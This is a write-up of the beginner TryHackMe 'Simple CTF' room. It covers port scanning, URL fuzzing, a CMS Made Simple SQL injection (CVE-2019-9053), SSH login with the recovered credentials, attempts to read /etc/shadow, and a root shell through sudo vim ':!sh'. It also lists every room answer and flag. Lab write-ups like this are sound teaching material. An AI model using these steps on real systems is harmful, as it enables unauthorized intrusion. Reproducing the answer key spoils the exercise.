Writeup: Try Hack Me — Simple CTF
Simple CTF is a beginner level CTF Room on TryHackMe. (https://tryhackme.com/room/easyctf)
Let’s join the room and deploy the machine, by pressing the deploy button.
While the machine loads and the IP becomes visible, ensure that you are connected to try hack me network using openvpn.
Once all these things are done, lets start hacking the machine.
The first thing we need to check is the list of open ports. This tells us about the services on the machine which are public, and have a high probability of having vulnerabilities in them(which we need to crack). Run nmap on the target to obtain a list of open ports.
sudo nmap -sC -sS -p- 10.10.56.215 > nmap_scan
We observe that the following services are running — ftp on port 21 , http on port 80, ssh on port 2222
The results of this scan help us answer the first 2 questions:
#1: How many services are running under port 1000? — 2
#2: What is running on the higher port? — ssh
The open ftp server was a red herring, it lead to a dead end. So I’ll not write about that here.
Next, We observe port 80 is also open. Navigating to the ip through the browser shows us the default apache page. We fuzz the url to see if we find some interesting endpoints (the wordlist can be found at here). I’ve used fuff, you can use other tools like gobuster/dirbuster etc
ffuf -u <ip> -w common.txt
Fuzzing the url gives us the /simple endpoint.
Navigating to the url, show us the homepage of Made Simple CMS. We search (google) for well-known exploits on MadeSimple.
This leads us to CVE-2019–9053. On researching further we obtain a python script which can be used for the attack. All these resources can be found here (here). This helps us answer the next couple of questions
#3 What’s the CVE you’re using against the application? — CVE-2019–9053
#4 To what kind of vulnerability is the application vulnerable? — SQLi
(Note: I was on a slow irregular network, and most probably due to this, the results of the script were inaccurate. I wasted a lot of time trying to figure out if I was executing the script wrong, but in the end solved the problem by switching to a better network)
#5 What’s the password? — secret
Now that we have a username and it’s password let to try to ssh into the machine using this username(mitch) and password(secret).
ssh mitch@<ip> -p 2222
We observe that this works and we are logged into the machine as mitch. Now, we can answer the next question.
#6 Where can you login with the details obtained? — ssh
The next couple of steps are easy. We navigate to the home directory. Here, in the home directory, we find the user flag which helps us answer the next question
#7 What’s the user flag? — G00d j0b, keep up!
Move a directory up from mitch’s home directory ( go to /home ) and list all files in this directory. Here you observe an entry for another user which is the answer to the next question.
#8 Is there any other user in the home directory? What’s its name? — sunbath
Now we need to access the root flag, for which we’ll need to be logged in as the super user. Lets see how that can be done -
i. Running find / -user mitch to view all files accessible by mitch. This does not yield anything interesting.
ii. Viewing the contents of /etc/passwd(nothing interesting), /etc/shadow(permission denied), /etc/group(empty file) yields no results either.
iii. Lets see what access mitch has. Running sudo -l gives us the following results:
Great. We observe that we can execute vim as a superuser. Lets try opening a random file as superuser.
#9 What can you leverage to spawn a privileged shell? — vim
sudo vim test.txt
To open a root terminal inside vim, press :!sh. This opens up a shell. Navigate to /root inside the shell and cat the contents of the root flag. This gives us the answer to the final question.
#10 What’s the root flag? — W3ll d0n3. You made it!
This solves the room. Hope you learnt something new. Reach out in case of any doubts / difficulties.
